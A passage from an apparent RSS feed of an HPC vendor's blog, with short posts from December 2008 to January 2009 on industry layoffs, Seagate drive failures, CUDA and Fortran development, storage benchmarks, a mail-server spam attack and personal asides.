      <description>/. indicated that as of this moment, Redhat is worth more (higher market capitalization) than Sun. So I checked it out. As of this writing, RHT has a market cap of $2.62B, with $0.76B cash on hand. This suggests that the company has a value exclusive of cash, of about $1.9B. Not bad for a company that doesn&amp;rsquo;t actually make the technology behind its core product offerings. As of this writing, JAVA has a market cap of $2.</description>
    </item>
    
    <item>
      <title>The RIFs continue:  now the bigger players in HPC</title>
      <link>https://blog.scalability.org/2009/01/the-rifs-continue-now-the-bigger-players-in-hpc/</link>
      <pubDate>Thu, 22 Jan 2009 15:45:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/the-rifs-continue-now-the-bigger-players-in-hpc/</guid>
      <description>News (I guess not unexpected) this morning is that Microsoft is cutting staff, Intel is closing down underutilized resources and cutting staff, IBM is cutting staff, and we heard yesterday from John at InsideHPC.com of more cuts at AMD. Having been on the wrong end of RIFs before, I know what it is like. I empathize with those affected. Having run a company for 6+ years, I know the abject terror of the other side of this.</description>
    </item>
    
    <item>
      <title>Things you should never do to a customers&#39; machine/disk: Part 10, bricking a drive</title>
      <link>https://blog.scalability.org/2009/01/things-you-should-never-do-to-a-customers-machinedisk-part-10-bricking-a-drive/</link>
      <pubDate>Wed, 21 Jan 2009 13:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/things-you-should-never-do-to-a-customers-machinedisk-part-10-bricking-a-drive/</guid>
      <description>Ouch. We test our JackRabbit and Delta-V (ΔV) units extensively &amp;hellip; long burn-in times, after any firmware updates. We like to run into the problems in-lab as compared to in-field. Some customers get annoyed at what they perceive to be slow shipping, but we want to know, when it leaves our lab, that this machine, and all its parts, works.
It appears that Seagate is having an issue with this last bit.</description>
    </item>
    
    <item>
      <title>Nail, hammer, hit hit hit!</title>
      <link>https://blog.scalability.org/2009/01/nail-hammer-hit-hit-hit-2/</link>
      <pubDate>Tue, 20 Jan 2009 05:04:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/nail-hammer-hit-hit-hit-2/</guid>
      <description>John West has a great commentary at InsideHPC.com. First I recommend, if you haven&amp;rsquo;t read it, by all means, read it. He points out that Addison Snell (a former colleague during SGI days) stands by his HPC spending/market analysis of several months ago. Further, he notes something I saw in another press release recently, that indicates that financial services firms are remaining committed to HPC.
John&amp;rsquo;s summary of Tabor&amp;rsquo;s results notes that purchases may be deferred or placed on hold.</description>
    </item>
    
    <item>
      <title>Day job has a sale!</title>
      <link>https://blog.scalability.org/2009/01/day-job-has-a-sale/</link>
      <pubDate>Sun, 18 Jan 2009 03:02:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/day-job-has-a-sale/</guid>
      <description>Doug has worked his magic, and turned our &amp;hellip; er &amp;hellip; aggressively cold weather, into a sales tool. We are having a 10% off sale. Details here. Yesterday, when I drove into work, the car thermometer registered -18F. Yup. That&amp;rsquo;s right. Should be warming up soon though. I hear we might crack 10 degrees. On the + side of 0. Soon. Meanwhile, shoveling snow was &amp;hellip; er &amp;hellip; fun &amp;hellip; (not!</description>
    </item>
    
    <item>
      <title>Working on Cuda&#43;Fortran</title>
      <link>https://blog.scalability.org/2009/01/working-on-cudafortran/</link>
      <pubDate>Sun, 18 Jan 2009 02:55:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/working-on-cudafortran/</guid>
      <description>So we have something like 5 different Cuda capable machines in the company. My laptop, an older Quadro FX 1400 based Opteron 275 based machine, a GeForce 8800 based machine, a dual GTX260 based machine, and a Tesla machine with 3 GPUs. The latter is to be our new desk(side|top) personal supercomputer offering. Pegasus-(I|A)(3|4)G. Complex .. dealing with case/PS issues now &amp;hellip; rest of it works fine. Current unit is powered by a Shanghai pair which we are testing with.</description>
    </item>
    
    <item>
      <title>stretching my (g)fortran legs ...</title>
      <link>https://blog.scalability.org/2009/01/stretching-my-gfortran-legs/</link>
      <pubDate>Sun, 18 Jan 2009 00:56:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/stretching-my-gfortran-legs/</guid>
      <description>Working on a quick project for a partner. I haven&amp;rsquo;t done much fortran programming in the last few years, mostly C, Perl, and a few other things. It&amp;rsquo;s been a while, but now I am remembering why I disliked multi-language programming in the past. You have to fight with the linkers (and compilers) to get them to do the right thing. Stuff that should &amp;ldquo;just work&amp;rdquo; doesn&amp;rsquo;t.
I really, really, just want to call c_Function(argument1, argument2, .</description>
    </item>
    
    <item>
      <title>ummm.... er ..... uh .... oh ....</title>
      <link>https://blog.scalability.org/2009/01/ummm-er-uh-oh/</link>
      <pubDate>Sat, 17 Jan 2009 04:45:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ummm-er-uh-oh/</guid>
      <description>Seagate appears to be having an issue. A fairly large number of drive models, recent models, both enterprise and desktop, appear to have some serious failure issues. We have been using Seagates for a while, and they have been reliable. We have seen a higher failure rate than they report, but we chalked that up to Seagate marketing using a somewhat optimistic interpretation of test result statistics. Call it a mis-set calibration point.</description>
    </item>
    
    <item>
      <title>... and the 3 GPU Pegasus unit with Shanghai CPUs is up</title>
      <link>https://blog.scalability.org/2009/01/and-the-3-gpu-pegasus-unit-with-shanghai-cpus-is-up/</link>
      <pubDate>Fri, 16 Jan 2009 00:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-the-3-gpu-pegasus-unit-with-shanghai-cpus-is-up/</guid>
      <description>mwhahaha!!!! Cuda goodness. Will get updated GPU-HMMer data with real C1060s.</description>
    </item>
    
    <item>
      <title>... and Joe messes up mailman aliases ... D&#39;oh!</title>
      <link>https://blog.scalability.org/2009/01/and-joe-messes-up-mailman-aliases-doh/</link>
      <pubDate>Thu, 15 Jan 2009 12:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-joe-messes-up-mailman-aliases-doh/</guid>
      <description>Yeah &amp;hellip; I did just nuke my own email server for about 30 minutes. My bad. All better (no really, all better!).</description>
    </item>
    
    <item>
      <title>... and Rackable trims ...</title>
      <link>https://blog.scalability.org/2009/01/and-rackable-trims/</link>
      <pubDate>Wed, 14 Jan 2009 21:34:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-rackable-trims/</guid>
      <description>Rackable, which does do some HPC, is trimming down.</description>
    </item>
    
    <item>
      <title>... and Satyam imploded last week</title>
      <link>https://blog.scalability.org/2009/01/and-satyam-imploded-last-week/</link>
      <pubDate>Wed, 14 Jan 2009 16:59:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-satyam-imploded-last-week/</guid>
      <description>While not HPC related, we live in a non-ivory tower world. Satyam is one of the large Indian outsourcing firms. Last week, the founding brothers admitted to serious irregularities and fraud. This week the Indian government is moving swiftly to try to contain the damage.
The relation to HPC comes through other Indian outsourcing providers such as Tata and Wipro, both of whom have HPC efforts underway. This scandal should not impact them, though it could partially undermine confidence in this business model.</description>
    </item>
    
    <item>
      <title>... and Nortel files for Chapter 11 protection</title>
      <link>https://blog.scalability.org/2009/01/and-nortel-files-for-chapter-11-protection/</link>
      <pubDate>Wed, 14 Jan 2009 16:50:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-nortel-files-for-chapter-11-protection/</guid>
      <description>See this link at Yahoo. We have lots of customers with Nortel switches. We don&amp;rsquo;t use them that much, but others have. I don&amp;rsquo;t expect this to be the last to file for protection, by any stretch of the imagination.</description>
    </item>
    
    <item>
      <title>Seagate 10% RIF</title>
      <link>https://blog.scalability.org/2009/01/seagate-10-rif/</link>
      <pubDate>Mon, 12 Jan 2009 15:43:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/seagate-10-rif/</guid>
      <description>As seen on Barrons. CEO Watkins is out, replaced with Stephen Luczo. Seagate makes good disk drives, and drive prices have been hammered in recent weeks. Pricing went into something near a free-fall over the last 6 weeks. While this is good for JackRabbit and ΔV customers, it is bad for drive manufacturers that have to show a sustained profit. Seagate is reporting that it had a bad December, and as many other technology-based product outfits have as well, I think this may be the first of many such announcements.</description>
    </item>
    
    <item>
      <title>HPC Virtualization</title>
      <link>https://blog.scalability.org/2009/01/hpc-virtualization/</link>
      <pubDate>Mon, 12 Jan 2009 13:47:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/hpc-virtualization/</guid>
      <description>John at InsideHPC.com has a discussion going on HPC virtualization. Basically John&amp;rsquo;s point is that programmer/user time is more valuable than machine raw power. And that while VMs pull down performance, machine utilization is so low to begin with, that it doesn&amp;rsquo;t matter.
I don&amp;rsquo;t disagree that machine utilization is low, nor do I disagree that VMs will impact performance. I don&amp;rsquo;t dispute that programmer/user time is important. The issue I keep running into is the quality of compiler generated code.</description>
    </item>
    
    <item>
      <title>DoS update:  Its over, and I have some nice new tools to help stop them</title>
      <link>https://blog.scalability.org/2009/01/dos-update-its-over-and-i-have-some-nice-new-tools-to-help-stop-them/</link>
      <pubDate>Mon, 12 Jan 2009 13:22:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/dos-update-its-over-and-i-have-some-nice-new-tools-to-help-stop-them/</guid>
      <description>Basically someone decided to fire off many emails to us. Their effort was from some team of bots (ToB), and came largely from the .ru domain. I wrote some quick and dirty tools to scan our logs, and generate a hash table of IP addresses, and plugged this into a smtpd client filter. So after the first few failed emails, we have the bot&amp;rsquo;s signature. And we can reject future emails from them, even for a short period of time.</description>
    </item>
    
    <item>
      <title>on the DoS going on against our mail system ...</title>
      <link>https://blog.scalability.org/2009/01/on-the-dos-going-on-against-our-mail-system/</link>
      <pubDate>Sun, 11 Jan 2009 20:40:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/on-the-dos-going-on-against-our-mail-system/</guid>
      <description>Yes, someone with lots of machines in a .ru domain, is trying to send us lots of spam. Trying a DoS, but I don&amp;rsquo;t think it&amp;rsquo;s working all that well. But what is troubling to me is that several of the machines listed give .army.mil addresses. Which, if they aren&amp;rsquo;t forged, says something profoundly bad about security on our armed forces machines. Sure, they could be little spambots. Imagine if they were more than little spambots.</description>
    </item>
    
    <item>
      <title>Look for a future writeup of using SSE2, Cuda, and regular old coding</title>
      <link>https://blog.scalability.org/2009/01/look-for-a-future-writeup-of-using-sse2-cuda-and-regular-old-coding/</link>
      <pubDate>Sun, 11 Jan 2009 17:35:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/look-for-a-future-writeup-of-using-sse2-cuda-and-regular-old-coding/</guid>
      <description>I thought there might be some interest in this, given some of the posts we have done last year. If I hit article length (suspect I will), then I&amp;rsquo;ll submit it for publication. As a teaser, the baseline version of rzf for arguments -l 1000000000 -n 2 takes 34.83s on my laptop CPU, while the SSE2 version of the same code takes 7.62s. As this is a Cuda enabled laptop, I intend to get this version going as well shortly.</description>
    </item>
    
    <item>
      <title>First tests with btrfs on ΔV3</title>
      <link>https://blog.scalability.org/2009/01/first-tests-with-btrfs-on-v3/</link>
      <pubDate>Fri, 09 Jan 2009 03:51:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/first-tests-with-btrfs-on-v3/</guid>
      <description>[Btrfs](http://btrfs.wiki.kernel.org/index.php/Main_Page) is a new file system being developed. GPL licensed, this is what the page notes:</description>
    </item>
    
    <item>
      <title>WTH?  Linux software doing the &#34;bloat thing&#34;?</title>
      <link>https://blog.scalability.org/2009/01/wth-linux-software-doing-the-bloat-thing/</link>
      <pubDate>Thu, 08 Jan 2009 23:41:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/wth-linux-software-doing-the-bloat-thing/</guid>
      <description>From a top screen output &amp;hellip; on my laptop:
top - 18:43:01 up 1:06, 2 users, load average: 1.19, 1.36, 1.17
Tasks: 178 total, 3 running, 175 sleeping, 0 stopped, 0 zombie
Cpu0 : 11.9%us, 3.0%sy, 0.0%ni, 84.2%id, 0.0%wa, 1.0%hi, 0.0%si, 0.0%st
Cpu1 : 76.2%us, 5.0%sy, 0.0%ni, 17.8%id, 0.0%wa, 0.0%hi, 1.0%si, 0.0%st
Mem:  2571704k total, 1640064k used,  931640k free,   36796k buffers
Swap:  995988k total,       0k used,  995988k free,  476952k cached

 PID USER     PR NI  VIRT  RES  SHR S %CPU %MEM   TIME+ COMMAND
7367 landman  20  0 1374m 541m  39m S   57 21.</description>
    </item>
    
    <item>
      <title>Cluster 10GbE:  still in the future</title>
      <link>https://blog.scalability.org/2009/01/cluster-10gbe-still-in-the-future/</link>
      <pubDate>Thu, 08 Jan 2009 18:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/cluster-10gbe-still-in-the-future/</guid>
      <description>John West at InsideHPC asks about 10 GbE on clusters. The point I made (in two posts), and one we verify every time we spec a system out for a customer, is that 10 GbE is still priced higher per port than IB. This doesn&amp;rsquo;t mean we don&amp;rsquo;t like 10GbE. On the contrary, it is simpler/easier to deal with. But it comes at a price penalty, and a non-trivial one at that.</description>
    </item>
    
    <item>
      <title>OT:  flash plugin for 64 bit firefox on linux works well</title>
      <link>https://blog.scalability.org/2009/01/ot-flash-plugin-for-64-bit-firefox-on-linux-works-well/</link>
      <pubDate>Wed, 07 Jan 2009 12:35:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-flash-plugin-for-64-bit-firefox-on-linux-works-well/</guid>
      <description>No, this is not the nspluginwrapper thunking layer thing that lets you run 32 bit NSAPI plugins on 64 bit linux. While that is a neat tool, it was prone to lots of crashing. No, this is an adobe native implementation of flash. I don&amp;rsquo;t have to kill npviewer.bin after/during firefox anymore. I don&amp;rsquo;t have to see large greyed out boxes when npviewer.bin crashes. This is good.
Flash now works right &amp;hellip; only took adobe 3 years after getting flash on Linux to get 64 bit basically right.</description>
    </item>
    
    <item>
      <title>Question for accelerator users or those thinking of using accelerators</title>
      <link>https://blog.scalability.org/2009/01/question-for-accelerator-users-or-those-thinking-of-using-accelerators/</link>
      <pubDate>Wed, 07 Jan 2009 00:06:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/question-for-accelerator-users-or-those-thinking-of-using-accelerators/</guid>
      <description>Ok, this is somewhat business related; I want to have a sense of what would make the most sense for you to have. For example, there are nice CUBLAS libs now. And some FFT implementations. What else do people need? Are you adopting an accelerator platform because the tools you need are there? Or are you resisting adopting the platform because of missing tools? What platforms are you looking at adopting and why?</description>
    </item>
    
    <item>
      <title>OT:  root canal</title>
      <link>https://blog.scalability.org/2009/01/ot-root-canal/</link>
      <pubDate>Wed, 07 Jan 2009 00:02:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-root-canal/</guid>
      <description>Went in for my root canal today. Took them 7 X-tips to numb me up. Last week they tried prepping the area and 10 didn&amp;rsquo;t do it (and that is the limit). Turns out they didn&amp;rsquo;t hit the right spot. They had to drill deep to get it. For those who don&amp;rsquo;t know, X-tip is wonderful. Though it hurts for 2-3 seconds as they drill and start depositing the anesthetic. That and it leaves an awful taste.</description>
    </item>
    
    <item>
      <title>Rumors of rumors ...</title>
      <link>https://blog.scalability.org/2009/01/rumors-of-rumors/</link>
      <pubDate>Mon, 05 Jan 2009 18:07:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/rumors-of-rumors/</guid>
      <description>/. has a link to a Microsoft RIF rumor. And I heard from a number of sources about a Big Blue RIF.
I have heard from a number of sources of rumors at Dell and others. AMD lost quite a few, including the father of the stream benchmark. There are likely others out there I haven&amp;rsquo;t covered/mentioned.</description>
    </item>
    
    <item>
      <title>Color me impressed</title>
      <link>https://blog.scalability.org/2009/01/color-me-impressed/</link>
      <pubDate>Mon, 05 Jan 2009 05:17:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/color-me-impressed/</guid>
      <description>Ok &amp;hellip; I had gone off on the OFED build/installation scripts for v1.3 and before, noting that they required that I do lots of patching, as the build environment &amp;hellip; basically wrappers around rpmbuild &amp;hellip; made distro-specific assumptions. I don&amp;rsquo;t have a problem with using rpmbuild. RPMs annoy me in general, as they have been little more than a moving target, and sadly rendered effectively incompatible across distros. Not just the binary ones, but the source RPMs are very hard to build on any but the target distro.</description>
    </item>
    
    <item>
      <title>banned word lists ... maybe we need them in HPC?</title>
      <link>https://blog.scalability.org/2009/01/banned-word-lists-maybe-we-need-them-in-hpc/</link>
      <pubDate>Mon, 05 Jan 2009 04:20:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/banned-word-lists-maybe-we-need-them-in-hpc/</guid>
      <description>Saw this mentioned all over the web &amp;hellip; Quite a few of them are good. I like the &amp;ldquo;not so much&amp;rdquo; phrase though &amp;hellip; sad to see it in need of banning. I liked the carbon footprint explanation. What a business model &amp;hellip;
heh &amp;hellip; Ok. What words should we ban in HPC? Back when I was at SGI, we used to make fun of the marketeers with their &amp;ldquo;breakthrough&amp;rdquo;. Hence, I nominate &amp;ldquo;breakthrough&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>RAID != backup</title>
      <link>https://blog.scalability.org/2009/01/raid-backup/</link>
      <pubDate>Fri, 02 Jan 2009 17:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/raid-backup/</guid>
      <description>(for my fortran brethren, != -&amp;gt; .ne. ) On /. is an object lesson in what not to do for valuable data. Backups are important. This cannot be stressed enough.
More to the point, there are many things that are not backups. Snapshots come to mind. Yet we see people use them in this manner. In this day and age with &amp;ldquo;dedup&amp;rdquo; the fad du jour (all it does is make each block that much more valuable, and important not to have go away &amp;hellip;) backup is ever more important.</description>
    </item>
    
    <item>
      <title>An enjoyable read ...</title>
      <link>https://blog.scalability.org/2009/01/an-enjoyable-read/</link>
      <pubDate>Thu, 01 Jan 2009 20:25:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/an-enjoyable-read/</guid>
      <description>This presentation on diversity in HPC. Diversity of HPC &amp;hellip; machines, OSes, architectures &amp;hellip; and comments from the author. Very good read. Did I mention it was good?</description>
    </item>
    
    <item>
      <title>blasting through heavy loads ...</title>
      <link>https://blog.scalability.org/2008/12/blasting-through-heavy-loads/</link>
      <pubDate>Wed, 31 Dec 2008 20:24:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/blasting-through-heavy-loads/</guid>
      <description>Previously I had told you about octobonnie. 8 simultaneous bonnies run locally to beat the heck out of our servers. If we are going to catch a machine based problem, it will likely show up under this wilting load. But while that is a heavy load, it is nothing like what we have going on now.
I am sitting here in the office monitoring one of our boxes being tested by a customer before they put it into production (oil and gas market), as they load it from their cluster.</description>
    </item>
    
    <item>
      <title>Happy new year to all!</title>
      <link>https://blog.scalability.org/2008/12/happy-new-year-to-all/</link>
      <pubDate>Wed, 31 Dec 2008 19:58:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/happy-new-year-to-all/</guid>
      <description>Ok, a little early for those in NA, but late for those in Oz and about past it for India, but as you can see from WorldTimeZone, it&amp;rsquo;s coming to Europe/mid-Africa as I write this &amp;hellip; happy new year to you all</description>
    </item>
    
    <item>
      <title>I saw a link to this, this evening</title>
      <link>https://blog.scalability.org/2008/12/i-saw-a-link-to-this-this-evening/</link>
      <pubDate>Tue, 30 Dec 2008 06:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-saw-a-link-to-this-this-evening/</guid>
      <description>The ruins of Detroit. Look for the Michigan Central Rail Road station, and see if you recognize this from the recent Transformers movie. The building is near Mexican Town, south-ish of the old Tiger Stadium.</description>
    </item>
    
    <item>
      <title>This is not the right direction ...</title>
      <link>https://blog.scalability.org/2008/12/this-is-not-the-right-direction/</link>
      <pubDate>Tue, 30 Dec 2008 04:54:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/this-is-not-the-right-direction/</guid>
      <description>&amp;hellip; a weak dollar is a good dollar. Makes our exports more desirable.
[USD/GBP 1 year chart](http://finance.yahoo.com/q/bc?s=USDGBP=X&amp;amp;t=1y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
From Yahoo, linked back to the page. Really, we need that dollar lower. Makes exporters happy.</description>
    </item>
    
    <item>
      <title>Pure unabridged speculation ... guessing really on my part</title>
      <link>https://blog.scalability.org/2008/12/pure-unabridged-speculation-guessing-really-on-my-part/</link>
      <pubDate>Tue, 30 Dec 2008 03:35:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/pure-unabridged-speculation-guessing-really-on-my-part/</guid>
      <description>Ok. I read something while I was semi-conscious during my recent defeat at the hands of a 72 hour bug (that positively whupped me upside the head, stomach and other parts). I read Cisco is coming out with blade servers. Ok. Here is the 2 + 2 = 3 moment. Yeah, assume I am off the mark. Pure speculation. Shai, feel free to tell me here that I am full of it.</description>
    </item>
    
    <item>
      <title>The economy and HPC:  part 2</title>
      <link>https://blog.scalability.org/2008/12/the-economy-and-hpc-part-2/</link>
      <pubDate>Tue, 30 Dec 2008 03:13:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-economy-and-hpc-part-2/</guid>
      <description>Ok, so the last post left you feeling like you should just spin up some Pink Floyd on the turntable &amp;hellip; er &amp;hellip; ok &amp;hellip; I am dating myself here (turntable? sheesh). What I posited in the last post was that HPC has value. And it should be treated as such. But I also noted a few things.
First: Short term credit for business is pretty much non-existent. This impacts all HPC providers, smaller ones with fewer capital reserves harder than larger ones with capital reserves.</description>
    </item>
    
    <item>
      <title>The economy and HPC: part 1</title>
      <link>https://blog.scalability.org/2008/12/the-economy-and-hpc/</link>
      <pubDate>Tue, 30 Dec 2008 01:36:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-economy-and-hpc/</guid>
      <description>John West at InsideHPC.com covers a very important issue &amp;hellip; that being the meltdown of the economy, and its impact upon HPC, specifically HPC expenditure. Being on the vendor side of this I can offer my observations and make some suggestions.
First, allow me to note something that might not be too obvious to those in academia or government labs. There is no credit in the market. There is effectively zero ability to borrow new capital to fund parts purchases for HPC vendors outside of their existing credit facilities.</description>
    </item>
    
    <item>
      <title>The beatings will continue until morale improves ...</title>
      <link>https://blog.scalability.org/2008/12/the-beatings-will-continue-until-morale-improves/</link>
      <pubDate>Mon, 29 Dec 2008 21:52:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-beatings-will-continue-until-morale-improves/</guid>
      <description>Noooooooooooooooooooooooooooooooooo!!!! [whimper] [update] Mitch Albom goes a bit further. Says what needs to be said.</description>
    </item>
    
    <item>
      <title>we&#39;re back!!!</title>
      <link>https://blog.scalability.org/2008/12/were-back/</link>
      <pubDate>Mon, 29 Dec 2008 21:27:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/were-back/</guid>
      <description>yup &amp;hellip; a nice little down time courtesy of business class internet with SLAs &amp;hellip; even though this is the home office, still &amp;hellip; annoying. Considering rehosting at work &amp;hellip;</description>
    </item>
    
    <item>
      <title>under the weather ...</title>
      <link>https://blog.scalability.org/2008/12/under-the-weather/</link>
      <pubDate>Sun, 28 Dec 2008 02:29:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/under-the-weather/</guid>
      <description>&amp;hellip; which is why I haven&amp;rsquo;t commented on a number of interesting things. Hope to return to full capability over the next few days. Some bug decided to kick me hard a few hours after I wrote the previous post. Rehydrating and recovering.</description>
    </item>
    
    <item>
      <title>The night before xmas</title>
      <link>https://blog.scalability.org/2008/12/the-night-before-xmas/</link>
      <pubDate>Wed, 24 Dec 2008 18:33:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-night-before-xmas/</guid>
      <description>Twas the night before xmas, and all through the HPC solutions house, the disks were moving, just not the mouse &amp;hellip; The workers had gone home to their families, and shipped the last JackRabbit of the year, while the benchmarker cackled and tuned, making the ΔV faster.</description>
    </item>
    
    <item>
      <title>Initial ΔV4 numbers</title>
      <link>https://blog.scalability.org/2008/12/initial-v4-numbers/</link>
      <pubDate>Thu, 18 Dec 2008 23:50:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/initial-v4-numbers/</guid>
      <description>Thought a few people would like to see this. 8GB RAM machine, 24 drives, 36TB raw, 31.5TB after RAID6 with 1 hot spare. 29TB usable (there is some serious rounding error in many of the tools as I have discovered last night :( 1 TiB = 1.0995 TB, and 29T = 31.8 TB &amp;hellip; go figure &amp;hellip;)
root@dv4:~# df -h /data
Filesystem            Size  Used Avail Use% Mounted on
/dev/md0               29T   24G   29T   1% /data

and the file

root@dv4:~# ls -alFh /data/big.</description>
    </item>
    
    <item>
      <title>This is ... a ... good ... idea ... ???</title>
      <link>https://blog.scalability.org/2008/12/this-is-a-good-idea/</link>
      <pubDate>Thu, 18 Dec 2008 13:47:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/this-is-a-good-idea/</guid>
      <description>[Windows for Submarines rollout](http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/)
The line about &amp;ldquo;almost never need to give their command systems autonomous firing authority&amp;rdquo; does little to comfort me. Given the apparent ease with which external regimes can crack into the US DoD machines via virus/malware on windows systems &amp;hellip; this &amp;hellip; well &amp;hellip; doesn&amp;rsquo;t strike me as the smartest idea I have ever heard. It gives the phrase &amp;ldquo;blue screen of death&amp;rdquo; a whole new, and quite unwelcome, meaning.</description>
    </item>
    
    <item>
      <title>I keep forgetting why RBLs are such a bad idea ....</title>
      <link>https://blog.scalability.org/2008/12/i-keep-forgetting-why-rbls-are-such-a-bad-idea/</link>
      <pubDate>Tue, 16 Dec 2008 16:10:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-keep-forgetting-why-rbls-are-such-a-bad-idea/</guid>
      <description>Oh yeah. That&amp;rsquo;s why. Thanks AT&amp;amp;T, we really appreciate it.</description>
    </item>
    
    <item>
      <title>Whats more frightening ...</title>
      <link>https://blog.scalability.org/2008/12/whats-more-frightening/</link>
      <pubDate>Tue, 16 Dec 2008 14:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/whats-more-frightening/</guid>
      <description>The insecurity and potential compromise of a serious and exploitable &amp;ldquo;mis-feature&amp;rdquo; in a browser (causing the browser maker to suggest using a competitive browser platform), or the security theatre at all of the banks we deal with, who write their web pages specifically for that browser so that no other browsers will work properly with it, regardless of platform, and whose representatives insist in meetings with you that they are indeed secure &amp;hellip; &amp;ldquo;see the little lock?&amp;rdquo; they ask me derisively.</description>
    </item>
    
    <item>
      <title>Missing functionality finally added</title>
      <link>https://blog.scalability.org/2008/12/missing-functionality-finally-added/</link>
      <pubDate>Tue, 16 Dec 2008 03:02:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/missing-functionality-finally-added/</guid>
      <description>I have commented in the past on the &amp;hellip; er &amp;hellip; uh &amp;hellip; missing 64 bit Java plugins for Linux and other OSes. Well, Sun appears to have finally addressed this. Good job Sun. Better (6 years) late than never.</description>
    </item>
    
    <item>
      <title>Power outage at day job</title>
      <link>https://blog.scalability.org/2008/12/power-outage-at-day-job/</link>
      <pubDate>Sun, 14 Dec 2008 15:59:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/power-outage-at-day-job/</guid>
      <description>Some sort of fire at a local substation knocked power offline. Mail may bounce &amp;hellip; my apologies. Will try to re-route to here for the moment until we can get power restored. I have to verify that the building owner will allow generators on the premises &amp;hellip; [update] power is back up. New generator sitting in the loading bay area. Manual setup when we need it. Not needed now as the power came back on just when we were delivering the generator.</description>
    </item>
    
    <item>
      <title>GPU-HMMer is released</title>
      <link>https://blog.scalability.org/2008/12/gpu-hmmer-is-released/</link>
      <pubDate>Sun, 14 Dec 2008 02:56:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/gpu-hmmer-is-released/</guid>
      <description>From the mailing list &amp;hellip;</description>
    </item>
    
    <item>
      <title>Sun closes Network.com to new users ...</title>
      <link>https://blog.scalability.org/2008/12/sun-closes-networkcom-to-new-users/</link>
      <pubDate>Wed, 10 Dec 2008 05:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/sun-closes-networkcom-to-new-users/</guid>
      <description>The Register has an article on this. As I noted in the previous post (the linked article really), ASP reborn is a hard model to make work. You have to deliver what customers want, and do so inexpensively.
Amazon is succeeding at this in spades. Sun originally had the right idea &amp;hellip; then someone decided to make Network.com into a massive Solaris marketing tool rather than a resource on which you could run what you needed.</description>
    </item>
    
    <item>
      <title>Cloud computing article up on Linux Magazine</title>
      <link>https://blog.scalability.org/2008/12/cloud-computing-article-up-on-linux-magazine/</link>
      <pubDate>Wed, 10 Dec 2008 02:20:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/cloud-computing-article-up-on-linux-magazine/</guid>
      <description>My article on Cloud Computing is up. Only one equation. I promise!</description>
    </item>
    
    <item>
      <title>Co-inky-dink (coincidence)?</title>
      <link>https://blog.scalability.org/2008/12/co-inky-dink-coincidence/</link>
      <pubDate>Mon, 08 Dec 2008 16:09:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/co-inky-dink-coincidence/</guid>
      <description>Every now and then we look to see how people have found our web site. Usually a search engine is involved. So today, I found someone googling &amp;ldquo;JackRabbit Delta-V&amp;rdquo; and thought &amp;ldquo;Hey, people are starting to get to know our product names!&amp;rdquo; I&amp;rsquo;d been worried as I had discovered shortly after we got our trademarks on JackRabbit, that Apache has a &amp;ldquo;JackRabbit&amp;rdquo; project.
No overlap, I am not worried about brand dilution.</description>
    </item>
    
    <item>
      <title>Why ... oh why ... will I never learn ...</title>
      <link>https://blog.scalability.org/2008/12/why-oh-why-will-i-never-learn/</link>
      <pubDate>Mon, 08 Dec 2008 00:34:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/why-oh-why-will-i-never-learn/</guid>
